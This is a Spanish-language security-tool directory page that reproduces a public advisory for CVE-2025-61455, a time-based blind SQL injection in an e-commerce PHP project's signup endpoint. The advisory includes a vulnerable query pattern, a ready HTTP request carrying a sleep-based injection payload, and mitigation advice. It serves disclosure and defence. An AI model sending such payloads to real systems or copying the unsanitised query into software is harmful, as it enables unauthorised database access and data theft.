Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-61455 — Divulgación pública y prueba de concepto para CVE-2025-61455, una inyección SQL crítica en E-commerce Project v1.0, que incluye detalles técnicos, PoC y recomendaciones de mitigación. | Kitploit
Herramientas/GitHubGitHub/tansique-17/cve-2025-61455
Análisis de VulnerabilidadesExplotaciónSeguridad WebAprendizaje y EducaciónRecursos Curados
GitHubtansique-17/cve-2025-61455

CVE-2025-61455

Divulgación pública y prueba de concepto para CVE-2025-61455, una inyección SQL crítica en E-commerce Project v1.0, que incluye detalles técnicos, PoC y recomendaciones de mitigación.

Ver Repositorio
hace 10 mesesAún no revisado
Sitio web

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🛡️ Divulgación de CVE: CVE-2025-61455 — Inyección SQL en Proyecto de Comercio Electrónico

Fecha de divulgación: 14 de octubre de 2025
ID de CVE: CVE-2025-61455
Gravedad: CRÍTICA (CVSS 9.8)


🧩 Resumen

Existe una vulnerabilidad crítica de inyección SQL en E-commerce Project v1.0, específicamente en el endpoint signup.inc.php. La aplicación incorpora directamente entradas de usuario sin sanitizar en consultas SQL, lo que permite a atacantes no autenticados eludir la autenticación y ejecutar comandos SQL arbitrarios.

A este problema se le ha asignado el identificador CVE-2025-61455. En el momento de la divulgación pública, no había ningún parche oficial disponible.


📦 Producto afectado

  • Proveedor: Independiente (Bhabishya-123)
  • Proyecto: E-commerce
  • Versión: v1.0
  • Archivo: signup.inc.php
  • Endpoint vulnerable:
    https://localhost/e-commerce-main/includes/signup.inc.php

  • 🔬 Detalles de la vulnerabilidad

    La aplicación utiliza entradas sin sanitizar directamente en consultas SQL, sin ninguna validación de entrada ni sentencias preparadas. La vulnerabilidad existe en el parámetro aid del archivo signup.inc.php.

    Un atacante puede inyectar código SQL malicioso a través del parámetro de correo electrónico, lo que permite ataques de inyección SQL ciega basados en tiempo.

    Ejemplo de patrón de código vulnerable:

    root@kitploit:~
    $query = "SELECT * FROM table WHERE email='$email'";
    

    Esto permite cargas útiles de inyección que pueden manipular la lógica de las consultas y extraer datos sensibles.


    📌 Clasificación CWE

    ID de CWETítulo
    CWE-89Neutralización incorrecta de elementos especiales utilizados en un comando SQL

    📊 Puntuación CVSS v3.1

    PuntuaciónGravedadCadena de vector
    9.8CRÍTICACVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

    💥 Impacto

    Una explotación exitosa podría resultar en:

    • ✅ Omisión total de la autenticación
    • 🔓 Acceso no autorizado a funciones privilegiadas
    • 📊 Exfiltración de datos mediante inyección SQL ciega basada en tiempo
    • 🛠️ Posible manipulación o eliminación de datos
    • ⚠️ Compromiso total de la base de datos backend
    • 💻 Posibilidad de ejecución remota de código

    🧪 Prueba de concepto (PoC)

    1. Clonar el repositorio

    root@kitploit:~
    git clone https://github.com/Bhabishya-123/E-commerce.git
    

    2. Alojar localmente

    Usa XAMPP/LAMP para implementar el proyecto y navega a:

    root@kitploit:~
    http://localhost/e-commerce-main/includes/signup.inc.php
    

    3. Inyección de carga útil

    Envía la siguiente solicitud HTTP maliciosa:

    root@kitploit:~
    POST /e-commerce-main/includes/signup.inc.php HTTP/1.1
    Host: localhost
    Content-Type: application/x-www-form-urlencoded
    
    name=DvYLInUG&[email protected]'%2b(select*from(select(sleep(20)))a)%2b'&address=BWhKCxUw&number=666897&pwd=n7N%21j3r%21T7&rpwd=k0U%21t0f%21E9&submit=
    

    Explicación:
    El parámetro de correo electrónico contiene una carga útil de inyección SQL basada en tiempo: '+(select*from(select(sleep(20)))a)+'

    Si la aplicación se retrasa 20 segundos antes de responder, la inyección SQL es exitosa.


    🔐 Recomendaciones

    • ✅ Reemplaza las consultas SQL dinámicas con sentencias preparadas (mysqli_prepare() o PDO).
    • 🔍 Realiza validación y sanitización de entradas para todas las entradas de usuario.
    • 🧱 Implementa un cortafuegos de aplicaciones web (WAF) para bloquear patrones conocidos de inyección SQL.
    • 🛡️ Realiza auditorías de código periódicas y pruebas de penetración para la detección temprana.
    • 🔒 Implementa consultas parametrizadas para todas las interacciones con la base de datos.
    • 📝 Usa listas de permitidos para la validación de entradas cuando sea posible.

    📆 Cronología

    EventoFecha
    Vulnerabilidad descubierta16 de septiembre de 2025
    Divulgación pública13 de octubre de 2025
    Parche disponible❌ No disponible al momento de la divulgación

    🙋‍♂️ Créditos

    Esta vulnerabilidad fue descubierta y divulgada de manera responsable por:

    Tansique Dasari
    🔗 GitHub
    ✉️ [email protected]


    🔗 Referencias

    • OWASP - Inyección SQL
    • PortSwigger - Inyección SQL
    • CVE-2025-61455 en CVE.org

    💬 Este aviso se publica de forma independiente debido a la falta de respuesta del proveedor.

    Descargar herramienta